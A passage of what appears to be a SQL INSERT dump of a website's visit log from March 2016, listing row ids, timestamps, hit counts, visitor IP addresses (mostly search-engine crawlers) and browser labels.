.180.230.170',''),(21836,1458136137,1,1,0,0,'194.0.131.173','other'),(21837,1458136197,2,0,2,0,'66.249.66.166',''),(21838,1458136720,1,1,0,0,'40.77.167.60','other'),(21839,1458136732,2,0,2,0,'66.249.66.162',''),(21840,1458136889,1,0,1,0,'66.249.66.129',''),(21841,1458136908,4,0,4,0,'68.180.230.170',''),(21842,1458136942,3,0,3,0,'66.249.66.158',''),(21843,1458136949,2,1,1,0,'66.249.66.133',''),(21844,1458136983,1,1,0,0,'8.29.198.25','other'),(21845,1458137108,1,0,1,0,'66.249.66.190',''),(21846,1458137122,1,1,0,0,'194.44.104.166','firefox'),(21847,1458137255,1,1,0,0,'91.196.178.69','chrome'),(21848,1458137266,4,1,3,0,'66.249.66.158',''),(21849,1458137493,1,1,0,0,'93.127.126.246','firefox'),(21850,1458137653,1,1,0,0,'93.158.152.26','other'),(21851,1458137657,1,1,0,0,'141.8.132.79','other'),(21852,1458137661,1,1,0,0,'130.193.37.21','other'),(21853,1458138095,1,0,1,0,'66.249.66.162',''),(21854,1458138137,1,1,0,0,'185.46.151.86','firefox'),(21855,1458138294,1,1,0,0,'217.69.133.85','other'),(21856,1458138618,3,0,3,0,'66.249.66.158',''),(21857,1458138787,1,1,0,0,'217.69.133.219','other'),(21858,1458138874,1,1,0,0,'37.53.88.189','chrome'),(21859,1458139004,2,0,2,0,'66.249.66.162',''),(21860,1458139142,1,1,0,0,'91.196.178.67','firefox'),(21861,1458139649,1,1,0,0,'66.249.93.205','chrome'),(21862,1458139724,1,1,0,0,'130.193.51.102','other'),(21863,1458139727,1,1,0,0,'5.255.253.30','other'),(21864,1458139731,1,1,0,0,'130.193.37.27','other'),(21865,1458139736,1,1,0,0,'91.196.178.165','chrome'),(21866,1458139985,1,1,0,0,'40.77.167.35','other'),(21867,1458140183,1,0,1,0,'66.249.66.158',''),(21868,1458140245,1,0,1,0,'66.249.66.190',''),(21869,1458140335,1,0,1,0,'68.180.230.170',''),(21870,1458140414,1,1,0,0,'51.255.65.26','other'),(21871,1458140570,1,1,0,0,'94.179.111.38','firefox'),(21872,1458140643,1,1,0,0,'91.196.178.66','firefox'),(21873,1458141299,1,0,1,0,'66.249.66.166',''),(21874,1458141443,2,1,1,0,'66.249.66.166',''),(21875,1458141543,18,18,0,0,'80.91.162.99','other'),(21876,1458141748,300,300,0,0,'109.87.138.56','other'),(21877,1458141974,1,1,0,0,'94.178.110.143','firefox'),(21878,1458142047,5,0,5,0,'66.249.66.162',''),(21879,1458142535,1,0,1,0,'66.249.66.158',''),(21880,1458142614,3,0,3,0,'68.180.230.170',''),(21881,1458142703,1,1,0,0,'195.49.151.29','firefox'),(21882,1458142732,2,0,2,0,'66.249.66.166',''),(21883,1458143179,1,1,0,0,'164.132.161.29','other'),(21884,1458143522,1,1,0,0,'164.132.161.41','other'),(21885,1458143598,3,0,3,0,'66.249.66.162',''),(21886,1458143683,2,0,2,0,'68.180.230.170',''),(21887,1458143727,1,0,1,0,'66.249.66.166',''),(21888,1458143732,2,0,2,0,'66.249.66.133',''),(21889,1458143736,2,2,0,0,'40.77.167.60','other'),(21890,1458143782,1,1,0,0,'66.249.66.158','other'),(21891,1458143787,1,1,0,0,'207.46.13.63','other'),(21892,1458143905,1,0,1,0,'66.249.66.129',''),(21893,1458143941,1,1,0,0,'217.69.133.215','other'),(21894,1458144053,1,1,0,0,'92.113.132.130','chrome'),(21895,1458144187,1,1,0,0,'207.46.13.138','other'),(21896,1458144221,1,1,0,0,'66.249.92.95','other'),(21897,1458144236,1,1,0,0,'207.46.13.123','other'),(21898,1458144506,2,0,2,0,'66.249.66.162',''),(21899,1458144611,1,1,0,0,'193.106.248.116','firefox'),(21900,1458144613,1,1,0,0,'176.9.139.227','other'),(21901,1458145276,1,1,0,0,'141.8.142.88','other'),(21902,1458145294,1,1,0,0,'91.198.10.26','other'),(21903,1458145470,1,0,1,0,'66.249.66.158',''),(21904,1458146134,1,1,0,0,'66.249.66.158','other'),(21905,1458146234,1,1,0,0,'207.46.13.63','other'),(21906,1458146905,1,1,0,0,'66.249.66.162','other'),(21907,1458147183,2,0,2,0,'66.249.66.166',''),(21908,1458147519,1,1,0,0,'180.76.15.142','other'),(21909,1458147701,8,8,0,0,'82.193.127.15','other'),(21910,1458147986,1,1,0,0,'51.255.65.81','other'),(21911,1458147991,2,1,1,0,'66.249.66.158',''),(21912,1458148036,1,1,0,0,'8.29.198.26','other'),(21913,1458148270,2,2,0,0,'66.249.66.166','other'),(21914,1458148321,1,1,0,0,'217.69.133.215','other'),(21915,1458148447,2,2,0,0,'40.77.167.60','other'),(21916,1458148653,1,1,0,0,'164.132.161.47','other'),(21917,1458148689,3,1,2,0,'66.249.66.162',''),(21918,1458148738,1,1,0,0,'188.166.242.90','chrome'),(21919,1458148766,1,1,0,0,'172.110.22.35','firefox'),(21920,1458148768,1,1,0,0,'120.198.231.22','firefox'),(21921,1458148776,1,1,0,0,'220.226.188.171','chrome'),(21922,1458148779,1,1,0,0,'117.177.250.152','chrome'),(21923,1458148976,3,3,0,0,'66.249.66.158','other'),(21924,1458148977,1,1,0,0,'51.255.65.4','other'),(21925,1458149053,1,1,0,0,'207.46.13.63','other'),(21926,1458149710,1,1,0,0,'66.249.66.162','other'),(21927,1458149952,3,2,1,0,'66.249.66.158',''),(21928,1458150707,1,1,0,0,'66.249.66.158','other'),(21929,1458150782,1,0,1,0,'68.180.230.170',''),(21930,1458150852,1,1,0,0,'207.46.13.138','other'),(21931,1458150895,1,1,0,0,'66.249.66.162','other'),(21932,1458151215,1,1,0,0,'92.113.129.104','chrome'),(21933,1458151495,1,1,0,0,'5.248.132.200','chrome'),(21934,1458151798,1,0,1,0,'68.180.230.170',''),(21935,1458151902,96,96,0,0,'144.76.93.46','other'),(21936,1458152092,1,1,0,0,'91.196.179.69','chrome'),(21937,1458152461,1,1,0,0,'207.46.13.123','other'),(21938,1458152850,1,1,0,0,'89.234.157.254','chrome'),(21939,1458152867,1,1,0,0,'46.165.223.217','chrome'),(21940,1458152895,2,0,2,0,'68.180.230.170',''),(21941,1458152910,1,1,0,0,'66.249.66.166','other'),(21942,1458152939,1,1,0,0,'91.196.178.162','firefox'),(21943,1458153475,1,1,0,0,'66.249.66.162','other'),(21944,1458153610,4,4,0,0,'207.46.13.138','other'),(21945,1458153614,2,2,0,0,'207.46.13.63','other'),(21946,1458153626,5,5,0,0,'40.77.167.60','other'),(21947,1458153731,1,1,0,0,'217.69.133.224','other'),(21948,1458154568,1,1,0,0,'91.124.182.203','firefox'),(21949,1458155251,1,1,0,0,'51.255.65.92','other'),(21950,1458155375,1,1,0,0,'217.69.133.215','other'),(21951,1458155513,1,1,0,0,'66.249.92.103','other'),(21952,1458155717,1,1,0,0,'193.194.127.217','firefox'),(21953,1458155824,1,1,0,0,'46.133.100.74','firefox'),(21954,1458155857,1,0,1,0,'66.249.66.162',''),(21955,1458155895,1,1,0,0,'5.255.253.110','other'),(21956,1458155912,1,1,0,0,'66.249.66.162','other'),(21957,1458156111,1,1,0,0,'94.179.20.104','chrome'),(21958,1458156984,1,1,0,0,'51.255.65.14','other'),(21959,1458157004,1,0,1,0,'68.180.230.170',''),(21960,1458157784,1,1,0,0,'94.179.20.104','chrome'),(21961,1458158366,1,0,1,0,'66.249.66.162',''),(21962,1458158455,1,1,0,0,'207.46.13.138','other'),(21963,1458158790,1,0,1,0,'66.249.66.158',''),(21964,1458158875,1,1,0,0,'8.29.198.26','other'),(21965,1458158883,1,1,0,0,'46.133.100.74','firefox'),(21966,1458159058,1,1,0,0,'207.46.13.123','other'),(21967,1458159306,1,1,0,0,'213.179.252.217','chrome'),(21968,1458159490,1,1,0,0,'51.255.65.56','other'),(21969,1458159556,1,1,0,0,'164.132.161.49','other'),(21970,1458159732,1,1,0,0,'178.93.149.48','chrome'),(21971,1458159768,1,1,0,0,'66.249.83.222','chrome'),(21972,1458159837,1,0,1,0,'66.249.66.166',''),(21973,1458159920,1,1,0,0,'217.69.143.52','other'),(21974,1458159953,1,1,0,0,'180.76.15.13','other'),(21975,1458160683,1,0,1,0,'66.249.66.162',''),(21976,1458160996,1,1,0,0,'51.255.65.12','other'),(21977,1458161164,1,1,0,0,'66.249.66.166','other'),(21978,1458162259,1,0,1,0,'68.180.230.170',''),(21979,1458162653,1,1,0,0,'66.249.66.166','other'),(21980,1458163058,1,0,1,0,'40.77.167.60',''),(21981,1458163165,1,1,0,0,'51.255.65.27','other'),(21982,1458163385,1,1,0,0,'94.179.20.104','chrome'),(21983,1458163657,1,1,0,0,'217.69.133.225','other'),(21984,1458164038,1,1,0,0,'51.255.65.80','other'),(21985,1458164596,1,1,0,0,'62.212.73.49','chrome'),(21986,1458165018,2,0,2,0,'68.180.230.170',''),(21987,1458165365,1,1,0,0,'51.255.65.76','other'),(21988,1458165427,2,0,2,0,'66.249.66.166',''),(21989,1458165544,1,0,1,0,'66.249.66.162',''),(21990,1458165767,1,1,0,0,'66.249.92.99','other'),(21991,1458166064,1,1,0,0,'217.69.143.61','other'),(21992,1458166680,1,1,0,0,'217.69.133.215','other'),(21993,1458167361,2,2,0,0,'207.46.13.138','other'),(21994,1458168233,1,1,0,0,'80.212.18.61','other'),(21995,1458168880,2,0,2,0,'66.249.66.166',''),(21996,1458169437,3,3,0,0,'66.249.66.162','other'),(21997,1458169450,2,2,0,0,'66.249.66.158','other'),(21998,1458169493,1,1,0,0,'51.255.65.6','other'),(21999,1458169732,1,1,0,0,'8.29.198.25','other'),(22000,1458172033,1,1,0,0,'217.69.143.63','other'),(22001,1458172085,1,0,1,0,'68.180.230.170',''),(22002,1458172807,1,1,0,0,'66.249.93.94','chrome'),(22003,1458172875,1,1,0,0,'66.249.93.86','chrome'),(22004,1458172920,1,0,1,0,'66.249.66.166',''),(22005,1458172947,1,0,1,0,'66.249.66.158',''),(22006,1458173039,1,1,0,0,'89.38.150.47','firefox'),(22007,1458173088,1,0,1,0,'66.249.66.162',''),(22008,1458173329,2,0,2,0,'68.180.230.170',''),(22009,1458173403,1,1,0,0,'207.46.13.63','other'),(22010,1458173532,1,1,0,0,'207.46.13.138','other'),(22011,1458173580,2,2,0,0,'141.8.132.79','other'),(22013,1458173729,1,1,0,0,'164.132.161.28','other'),(22014,1458174279,1,1,0,0,'207.46.13.123','other'),(22015,1458174365,2,2,0,0,'141.8.132.2','other'),(22016,1458175374,2,0,2,0,'66.249.66.162',''),(22017,1458175693,1,1,0,0,'217.69.133.84','other'),(22018,1458175929,1,1,0,0,'217.69.133.215','other'),(22019,1458176143,1,1,0,0,'5.255.253.55','other'),(22020,1458176146,1,1,0,0,'5.255.253.9','other'),(22021,1458176149,1,1,0,0,'141.8.142.8','other'),(22022,1458176400,1,1,0,0,'66.249.92.99','other'),(22023,1458176627,1,1,0,0,'37.9.122.201','other'),(22024,1458176659,2,0,2,0,'66.249.66.162',''),(22025,1458176815,1,1,0,0,'164.132.161.94','other'),(22026,1458177172,1,1,0,0,'130.193.51.102','other'),(22027,1458177202,1,0,1,0,'68.180.230.170',''),(22028,1458177261,6,0,6,0,'66.249.66.158',''),(22029,1458177408,1,0,1,0,'66.249.66.190',''),(22030,1458177501,1,1,0,0,'217.69.143.60','other'),(22031,1458177594,2,0,2,0,'66.249.66.162',''),(22032,1458177927,1,1,0,0,'217.69.143.69','other'),(22033,1458177934,1,1,0,0,'40.77.167.60','other'),(22034,1458178185,1,1,0,0,'80.91.162.99','other'),(22035,1458178230,1,1,0,0,'51.255.65.65','other'),(22036,1458178774,1,1,0,0,'164.132.161.75','other'),(22037,1458179669,3,0,3,0,'66.249.66.162',''),(22038,1458179739,1,1,0,0,'141.8.142.41','other'),(22039,1458179804,3,0,3,0,'66.249.66.158',''),(22040,1458179940,2,0,2,0,'68.180.230.170',''),(22041,1458180358,1,1,0,0,'217.69.133.224','other'),(22042,1458180573,1,1,0,0,'66.249.66.166','other'),(22043,1458180632,1,1,0,0,'8.29.198.25','other'),(22044,1458180926,1,1,0,0,'141.8.132.76','other'),(22045,1458181210,2,0,2,0,'68.180.230.170',''),(22046,1458181260,1,1,0,0,'164.132.161.70','other'),(22047,1458181367,1,1,0,0,'164.132.161.17','other'),(22048,1458181539,1,1,0,0,'217.69.133.226','other'),(22049,1458182017,2,0,2,0,'66.249.66.166',''),(22050,1458182127,1,1,0,0,'178.154.149.11','other'),(22051,1458182131,1,1,0,0,'5.255.253.53','other'),(22052,1458182183,2,0,2,0,'66.249.66.162',''),(22053,1458182261,9,0,9,0,'66.249.66.158',''),(22054,1458183713,3,0,3,0,'68.180.230.170',''),(22055,1458183731,1,1,0,0,'5.255.253.53','other'),(22056,1458183735,1,1,0,0,'141.8.132.76','other'),(22057,1458184053,1,1,0,0,'217.69.143.59','other'),(22058,1458184247,3,0,3,0,'66.249.66.162',''),(22059,1458184828,1,0,1,0,'66.249.66.166',''),(22060,1458184905,2,0,2,0,'66.249.66.158',''),(22061,1458185058,1,1,0,0,'178.154.149.11','other'),(22062,1458185185,1,1,0,0,'51.255.65.56','other'),(22063,1458185203,1,1,0,0,'164.132.161.2','other'),(22064,1458185753,1,1,0,0,'62.210.215.100','chrome'),(22065,1458185955,1,1,0,0,'141.8.183.14','other'),(22066,1458186421,10,0,10,0,'66.249.66.158',''),(22067,1458186469,2,0,2,0,'66.249.66.162',''),(22068,1458186706,1,0,1,0,'68.180.230.170',''),(22069,1458186822,1,1,0,0,'62.210.215.100','chrome'),(22070,1458186930,1,1,0,0,'66.249.92.95','other'),(22071,1458187404,1,1,0,0,'141.8.184.18','other'),(22072,1458187408,2,2,0,0,'141.8.183.14','other'),(22073,1458187572,2,1,1,0,'66.249.66.162',''),(22074,1458187694,1,1,0,0,'40.77.167.60','other'),(22075,1458187777,1,0,1,0,'68.180.230.170',''),(22076,1458187936,2,1,1,0,'66.249.66.190',''),(22077,1458188332,1,0,1,0,'66.249.66.166',''),(22078,1458188358,6,0,6,0,'66.249.66.158',''),(22079,1458188379,1,1,0,0,'180.76.15.159','other'),(22080,1458188704,1,1,0,0,'66.249.66.158','other'),(22081,1458188819,1,1,0,0,'178.154.189.204','other'),(22082,1458188915,1,1,0,0,'141.8.184.18','other'),(22083,1458189212,2,2,0,0,'217.69.143.42','other'),(22084,1458189239,1,0,1,0,'66.249.66.162',''),(22085,1458189371,1,1,0,0,'217.69.143.70','other'),(22086,1458189372,1,1,0,0,'217.69.143.65','other'),(22087,1458189718,31,31,0,0,'82.193.127.15','other'),(22088,1458189917,1,1,0,0,'66.249.66.133','other'),(22089,1458189958,3,2,1,0,'66.249.66.158',''),(22090,1458189986,1,1,0,0,'130.193.51.45','other'),(22091,1458189990,3,3,0,0,'141.8.183.14','other'),(22092,1458190019,2,2,0,0,'5.255.253.53','other'),(22093,1458190041,1,1,0,0,'82.145.211.122','other'),(22094,1458190062,1,1,0,0,'5.255.253.100','other'),(22095,1458190069,1,1,0,0,'130.193.51.102','other'),(22096,1458190079,1,1,0,0,'5.255.253.9','other'),(22097,1458190096,1,1,0,0,'93.158.152.9','other'),(22098,1458190100,1,1,0,0,'178.154.149.11','other'),(22099,1458190318,2,0,2,0,'68.180.230.170',''),(22100,1458190362,3,3,0,0,'66.249.66.166','other'),(22101,1458191009,2,2,0,0,'66.249.66.162','other'),(22102,1458191195,1,0,1,0,'66.249.66.158',''),(22103,1458191217,1,1,0,0,'37.9.122.203','other'),(22104,1458191257,1,1,0,0,'164.132.161.45','other'),(22105,1458191378,1,1,0,0,'207.46.13.63','other'),(22106,1458191390,1,0,1,0,'66.249.66.166',''),(22107,1458191455,1,1,0,0,'8.29.198.26','other'),(22108,1458191696,1,1,0,0,'66.249.66.133','other'),(22109,1458191781,1,1,0,0,'141.8.142.10','other'),(22110,1458191986,1,0,1,0,'66.249.66.162',''),(22111,1458191994,6,6,0,0,'141.8.184.18','other'),(22112,1458192032,2,2,0,0,'109.86.239.229','other'),(22113,1458192043,1,1,0,0,'141.8.132.2','other'),(22114,1458192052,4,4,0,0,'5.255.253.100','other'),(22115,1458192056,1,1,0,0,'141.8.142.41','other'),(22116,1458192068,1,1,0,0,'130.193.51.45','other'),(22117,1458192075,1,1,0,0,'141.8.142.8','other'),(22118,1458192097,7,7,0,0,'141.8.183.14','other'),(22119,1458192104,5,5,0,0,'93.158.152.9','other'),(22120,1458192108,4,4,0,0,'130.193.37.21','other'),(22121,1458192130,2,2,0,0,'5.255.253.53','other'),(22122,1458192156,1,1,0,0,'141.8.132.99','other'),(22123,1458192181,3,3,0,0,'178.154.149.11','other'),(22124,1458192375,1,1,0,0,'51.255.65.73','other'),(22125,1458193447,2,0,2,0,'66.249.66.158',''),(22126,1458193507,1,0,1,0,'66.249.66.166',''),(22127,1458193603,1,1,0,0,'40.77.167.60','other'),(22128,1458193872,1,0,1,0,'68.180.230.170',''),(22129,1458194082,1,1,0,0,'66.249.66.158','other'),(22130,1458194480,1,1,0,0,'130.193.51.45','other'),(22131,1458194773,2,0,2,0,'68.180.230.170',''),(22132,1458194816,1,1,0,0,'213.179.252.214','chrome'),(22133,1458194981,1,1,0,0,'164.132.161.7','other'),(22134,1458195079,1,1,0,0,'66.249.66.166','other'),(22135,1458195198,1,1,0,0,'180.76.15.143','other'),(22136,1458195377,1,1,0,0,'164.132.161.24','other'),(22137,1458195781,1,1,0,0,'91.196.178.161','chrome'),(22138,1458196066,1,0,1,0,'66.249.66.162',''),(22139,1458196425,3,3,0,0,'178.154.149.11','other'),(22140,1458196433,3,3,0,0,'141.8.184.18','other'),(22141,1458196443,1,1,0,0,'95.134.3.201','firefox'),(22142,1458196604,1,1,0,0,'141.8.132.99','other'),(22143,1458196608,1,1,0,0,'5.255.253.53','other'),(22144,1458196831,1,1,0,0,'91.196.178.136','chrome'),(22145,1458196859,1,1,0,0,'40.77.167.60','other'),(22146,1458197415,1,1,0,0,'91.196.178.69','chrome'),(22147,1458197515,1,1,0,0,'66.249.93.86','chrome'),(22148,1458197603,1,0,1,0,'66.249.66.190',''),(22149,1458198062,1,1,0,0,'207.46.13.138','other'),(22150,1458198197,1,1,0,0,'51.255.65.61','other'),(22151,1458198264,1,1,0,0,'91.196.178.33','chrome'),(22152,1458198310,1,1,0,0,'66.249.92.99','other'),(22153,1458198406,1,1,0,0,'40.77.167.60','other'),(22154,1458198686,1,1,0,0,'46.172.238.153','chrome'),(22155,1458198923,1,1,0,0,'93.158.152.9','other'),(22156,1458198927,1,1,0,0,'130.193.37.21','other'),(22157,1458198948,1,0,1,0,'66.249.66.162',''),(22158,1458199060,1,1,0,0,'91.196.178.169','opera'),(22159,1458199134,1,1,0,0,'37.53.89.22','chrome'),(22160,1458199220,1,1,0,0,'164.132.161.17','other'),(22161,1458199225,1,1,0,0,'130.193.51.43','other'),(22162,1458199229,1,1,0,0,'141.8.184.11','other'),(22163,1458199364,1,1,0,0,'217.69.133.218','other'),(22164,1458199500,1,1,0,0,'37.52.62.107','firefox'),(22165,1458199694,1,1,0,0,'91.196.178.69','firefox'),(22166,1458199924,1,1,0,0,'180.76.15.22','other'),(22167,1458200008,1,1,0,0,'62.210.215.100','chrome'),(22168,1458200033,1,0,1,0,'68.180.230.170',''),(22169,1458200247,1,1,0,0,'95.134.3.201','firefox'),(22170,1458200261,1,1,0,0,'91.196.178.65','chrome'),(22171,1458200262,1,1,0,0,'91.196.178.71','firefox'),(22172,1458200316,1,1,0,0,'40.77.167.60','other'),(22173,1458200433,1,1,0,0,'91.196.178.169','chrome'),(22174,1458200649,1,1,0,0,'217.69.143.45','other'),(22175,1458200974,1,1,0,0,'217.69.143.67','other'),(22176,1458201138,1,1,0,0,'78.111.190.229','chrome'),(22177,1458201141,1,1,0,0,'66.249.66.166','other'),(22178,1458202436,1,1,0,0,'8.29.198.26','other'),(22179,1458202503,1,1,0,0,'91.196.178.71','firefox'),(22180,1458202832,1,1,0,0,'91.196.178.68','chrome'),(22181,1458202867,1,1,0,0,'178.95.246.136','chrome'),(22182,1458203317,1,0,1,0,'66.249.66.162',''),(22183,1458203348,2,0,2,0,'68.180.230.170',''),(22184,1458204425,1,1,0,0,'207.46.13.63','other'),(22185,1458204508,1,1,0,0,'178.95.246.242','chrome'),(22186,1458205012,1,1,0,0,'193.93.218.155','chrome'),(22187,1458205716,2,0,2,0,'66.249.66.158',''),(22188,1458205842,1,1,0,0,'78.111.185.167','firefox'),(22189,1458206114,2,2,0,0,'91.196.178.70','chrome'),(22190,1458206534,1,0,1,0,'68.180.230.170',''),(22191,1458206601,1,1,0,0,'217.69.143.48','other'),(22192,1458206658,1,1,0,0,'94.179.8.76','chrome'),(22193,1458206783,1,1,0,0,'164.132.161.46','other'),(22194,1458206856,1,1,0,0,'194.44.173.126','chrome'),(22195,1458207518,1,1,0,0,'94.179.63.235','chrome'),(22196,1458207788,1,1,0,0,'217.69.133.248','other'),(22197,1458208155,1,0,1,0,'68.180.230.170',''),(22198,1458208158,1,1,0,0,'95.133.112.166','firefox'),(22199,1458208573,1,1,0,0,'194.150.168.79','chrome'),(22200,1458208734,3,3,0,0,'80.91.162.99','other'),(22201,1458208798,1,1,0,0,'66.249.92.95','other'),(22202,1458208951,1,1,0,0,'51.255.65.40','other'),(22203,1458209051,229,229,0,0,'82.193.127.15','other'),(22204,1458209068,1,0,1,0,'68.180.230.170',''),(22205,1458209619,1,1,0,0,'207.46.13.93','other'),(22206,1458209632,1,1,0,0,'164.132.161.28','other'),(22207,1458209954,5,5,0,0,'82.193.127.15','other'),(22208,1458210452,195,195,0,0,'144.76.29.66','other'),(22209,1458211255,2,0,2,0,'68.180.230.170',''),(22210,1458211529,1,1,0,0,'141.8.183.14','other'),(22211,1458211586,1,1,0,0,'94.179.106.118','chrome'),(22212,1458211666,1,1,0,0,'51.255.65.58','other'),(22213,1458211971,1,1,0,0,'95.132.113.212','chrome'),(22214,1458212923,2,2,0,0,'66.249.66.162','other'),(22215,1458212956,1,0,1,0,'66.249.66.158',''),(22216,1458212959,1,1,0,0,'66.249.66.158','other'),(22217,1458213184,1,1,0,0,'37.73.194.199','other'),(22218,1458213258,1,1,0,0,'8.29.198.25','other'),(22219,1458213800,1,1,0,0,'5.255.253.62','other'),(22220,1458213904,1,1,0,0,'207.46.13.138','other'),(22221,1458214066,1,1,0,0,'91.196.179.33','firefox'),(22222,1458214596,1,1,0,0,'95.181.217.78','firefox'),(22223,1458214789,1,0,1,0,'68.180.230.170',''),(22224,1458215127,1,1,0,0,'178.93.3.27','chrome'),(22225,1458215132,1,1,0,0,'66.249.66.166','other'),(22226,1458215364,1,1,0,0,'66.249.66.158','other'),(22227,1458215701,1,0,1,0,'68.180.230.170',''),(22228,1458215989,1,1,0,0,'51.255.65.24','other'),(22229,1458216281,1,1,0,0,'91.196.178.132','firefox'),(22230,1458216388,1,1,0,0,'141.8.184.18','other'),(22231,1458216392,1,1,0,0,'178.154.149.11','other'),(22232,1458216396,1,1,0,0,'93.158.152.9','other'),(22233,1458216445,1,1,0,0,'193.110.18.32','chrome'),(22234,1458216642,1,1,0,0,'207.46.13.138','other'),(22235,1458216647,1,1,0,0,'66.249.66.162','other'),(22236,1458217559,1,1,0,0,'91.196.178.69','firefox'),(22237,1458217685,1,1,0,0,'94.45.131.212','chrome'),(22238,1458217828,1,1,0,0,'164.132.161.91','other'),(22239,1458218682,1,1,0,0,'91.196.178.69','firefox'),(22240,1458218722,1,1,0,0,'40.77.167.60','other'),(22241,1458218930,3,3,0,0,'141.8.184.18','other'),(22242,1458218934,1,1,0,0,'141.8.183.14','other'),(22243,1458218938,2,2,0,0,'178.154.149.11','other'),(22244,1458218947,1,1,0,0,'91.196.178.71','firefox'),(22245,1458219170,1,1,0,0,'93.158.152.9','other'),(22246,1458219307,1,1,0,0,'78.111.187.143','chrome'),(22247,1458219502,8,8,0,0,'178.203.146.227','other'),(22248,1458219552,1,1,0,0,'178.92.66.38','other'),(22249,1458219606,1,1,0,0,'66.249.92.95','other'),(22250,1458220386,1,1,0,0,'51.255.65.35','other'),(22251,1458220995,1,1,0,0,'91.196.178.71','firefox'),(22252,1458221062,1,1,0,0,'178.92.70.152','firefox'),(22253,1458221067,1,1,0,0,'46.200.101.56','chrome'),(22254,1458221347,1,0,1,0,'68.180.230.170',''),(22255,1458221428,1,1,0,0,'66.249.78.158','other'),(22256,1458221495,1,0,1,0,'66.249.78.151',''),(22257,1458221522,1,1,0,0,'40.77.167.60','other'),(22258,1458221581,1,1,0,0,'66.249.78.44','other'),(22259,1458221615,1,1,0,0,'91.196.178.67','chrome'),(22260,1458222107,1,1,0,0,'92.112.97.162','chrome'),(22261,1458222453,1,0,1,0,'68.180.230.170',''),(22262,1458222463,1,1,0,0,'217.69.143.63','other'),(22263,1458222642,46,46,0,0,'144.76.29.66','other'),(22264,1458222778,1,1,0,0,'78.111.185.205','chrome'),(22265,1458222836,1,1,0,0,'217.69.143.58','other'),(22266,1458223062,1,0,1,0,'66.249.66.133',''),(22267,1458223065,1,1,0,0,'164.132.161.28','other'),(22268,1458223094,1,1,0,0,'164.132.161.20','other'),(22269,1458223154,1,1,0,0,'37.139.171.83','chrome'),(22270,1458223552,1,1,0,0,'180.76.15.25','other'),(22271,1458223554,1,1,0,0,'66.249.78.158','other'),(22272,1458223758,1,1,0,0,'66.249.78.151','other'),(22273,1458224039,1,1,0,0,'40.77.167.60','other'),(22274,1458224112,1,1,0,0,'141.8.132.74','other'),(22275,1458224115,1,1,0,0,'141.8.184.6','other'),(22276,1458224119,1,1,0,0,'178.154.189.12','other'),(22277,1458224301,1,1,0,0,'8.29.198.25','other'),(22278,1458224700,2,2,0,0,'95.213.141.126','opera'),(22279,1458225246,1,1,0,0,'91.196.178.71','firefox'),(22280,1458225414,1,1,0,0,'78.111.185.204','chrome'),(22281,1458225523,1,1,0,0,'66.249.78.44','other'),(22282,1458225558,1,1,0,0,'91.196.178.167','chrome'),(22283,1458225776,1,1,0,0,'82.207.91.234','firefox'),(22284,1458225932,1,0,1,0,'66.249.66.166',''),(22285,1458226079,1,1,0,0,'31.41.71.28','other'),(22286,1458226330,2,0,2,0,'68.180.230.170',''),(22287,1458226640,1,1,0,0,'180.76.15.20','other'),(22288,1458226641,2,2,0,0,'178.154.149.11','other'),(22289,1458226644,1,1,0,0,'141.8.142.10','other'),(22290,1458226744,1,1,0,0,'78.111.185.204','chrome'),(22291,1458226870,1,1,0,0,'5.255.253.10','other'),(22292,1458226923,1,1,0,0,'91.196.178.167','chrome'),(22293,1458227071,1,0,1,0,'66.249.66.133',''),(22294,1458227353,1,0,1,0,'68.180.230.170',''),(22295,1458227705,1,1,0,0,'78.111.185.204','chrome'),(22296,1458227827,2,2,0,0,'66.249.78.151','other'),(22297,1458227882,1,0,1,0,'66.249.78.144',''),(22298,1458228014,1,1,0,0,'51.255.65.24','other'),(22299,1458228356,1,1,0,0,'207.46.13.123','other'),(22300,1458228462,2,0,2,0,'68.180.230.170',''),(22301,1458228665,1,1,0,0,'94.179.63.235','chrome'),(22302,1458228692,1,1,0,0,'176.120.40.74','chrome'),(22303,1458228943,1,1,0,0,'66.249.78.30','other'),(22304,1458229180,1,0,1,0,'66.249.66.162',''),(22305,1458229446,1,1,0,0,'176.113.149.67','chrome'),(22306,1458229525,1,1,0,0,'217.69.143.65','other'),(22307,1458229546,1,1,0,0,'141.8.132.2','other'),(22308,1458229948,1,1,0,0,'217.69.143.68','other'),(22309,1458230043,1,1,0,0,'91.196.178.135','chrome'),(22310,1458230600,1,1,0,0,'66.249.92.99','other'),(22311,1458230660,2,1,1,0,'66.249.78.151',''),(22312,1458231341,2,2,0,0,'66.249.78.144','other'),(22313,1458231353,1,1,0,0,'66.249.78.151','other'),(22314,1458231962,1,1,0,0,'51.255.65.14','other'),(22315,1458232468,1,1,0,0,'213.179.252.200','chrome'),(22316,1458232549,2,2,0,0,'66.249.78.44','other'),(22317,1458232832,1,1,0,0,'164.132.161.68','other'),(22318,1458233026,1,1,0,0,'66.249.66.129','other'),(22319,1458233204,1,1,0,0,'217.69.133.237','other'),(22320,1458233231,2,2,0,0,'66.249.78.158','other'),(22321,1458233410,4,4,0,0,'176.9.131.69','other'),(22322,1458234102,2,1,1,0,'66.249.78.144',''),(22323,1458234137,3,3,0,0,'80.91.162.99','other'),(22324,1458234462,2,1,1,0,'66.249.78.158',''),(22325,1458234533,1,0,1,0,'68.180.230.170',''),(22326,1458234878,3,0,3,0,'66.249.78.151',''),(22327,1458234951,24,24,0,0,'207.46.13.93','other'),(22328,1458234961,5,5,0,0,'69.30.236.2','other'),(22329,1458235005,2,0,2,0,'66.249.78.144',''),(22330,1458235009,16,16,0,0,'207.46.13.138','other'),(22331,1458235061,17,17,0,0,'207.46.13.123','other'),(22332,1458235102,1,1,0,0,'80.91.162.99','other'),(22333,1458235156,1,1,0,0,'8.29.198.25','other'),(22334,1458235435,1,1,0,0,'217.69.143.48','other'),(22335,1458235540,1,0,1,0,'66.249.78.158',''),(22336,1458235654,1,1,0,0,'173.208.136.170','chrome'),(22337,1458236524,1,1,0,0,'91.196.179.33','firefox'),(22338,1458236649,1,0,1,0,'66.249.78.158',''),(22339,1458236652,1,1,0,0,'66.249.78.158','other'),(22340,1458237271,1,1,0,0,'51.255.65.88','other'),(22341,1458237466,1,0,1,0,'68.180.230.170',''),(22342,1458237598,1,0,1,0,'66.249.78.144',''),(22343,1458237626,1,1,0,0,'91.124.182.203','firefox'),(22344,1458237892,1,1,0,0,'91.196.178.69','firefox'),(22345,1458238059,2,2,0,0,'80.91.162.99','other'),(22346,1458238124,1,1,0,0,'195.46.34.164','other'),(22347,1458238137,1,1,0,0,'51.255.65.59','other'),(22348,1458238565,2,1,1,0,'66.249.78.158',''),(22349,1458238873,1,1,0,0,'5.255.253.17','other'),(22350,1458239458,1,0,1,0,'66.249.78.